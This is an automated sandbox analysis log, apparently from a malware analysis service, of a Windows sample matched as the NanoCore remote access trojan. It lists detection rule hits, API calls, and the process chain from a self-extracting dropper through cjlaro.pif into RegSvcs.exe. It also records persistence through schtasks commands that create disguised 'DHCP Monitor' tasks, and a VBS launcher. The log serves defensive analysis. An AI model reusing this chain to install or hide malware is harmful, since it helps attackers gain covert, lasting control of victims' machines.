    Source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,20_2_011633A3
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: String function: 0020E2F0 appears 31 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: String function: 0020D940 appears 50 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: String function: 0020D870 appears 35 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 0113E970 appears 61 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01146B90 appears 115 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01148115 appears 61 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 011414F7 appears 81 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01131D10 appears 68 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 011413CB appears 42 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01139190 appears 39 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 0114333F appears 54 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01152160 appears 54 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01160165 appears 53 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 011759E6 appears 146 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01131DE0 appears 32 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 01132390 appears 32 times
    Source: C:\Users\user\77066510\cjlaro.pifCode function: String function: 011431BB appears 32 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_001F6FC6
    Source: dUzAkYsvl8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510Jump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/37@6/2
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile read: C:\Windows\win.iniJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F6D06 GetLastError,FormatMessageW,0_2_001F6D06
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0020963A
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
    Source: dUzAkYsvl8.exeVirustotal: Detection: 52%
    Source: dUzAkYsvl8.exeReversingLabs: Detection: 55%
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile read: C:\Users\user\Desktop\dUzAkYsvl8.exeJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\dUzAkYsvl8.exe 'C:\Users\user\Desktop\dUzAkYsvl8.exe'
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
    Source: unknownProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnrJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnrJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,4_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,10_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,20_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,20_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifFile created: C:\Users\user\temp\hrennftnds.cplJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0119E0F6 CoInitialize,CoCreateInstance,CoUninitialize,4_2_0119E0F6
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_0118D766
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A557E CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,4_2_011A557E
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_01
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ba2baad0-dd3f-4844-a1e3-4d042f9ae8b6}
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: ps#0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: sfxname0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: sfxstime0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: STARTDLG0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile written: C:\Users\user\77066510\gmbvs.iniJump to behavior
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
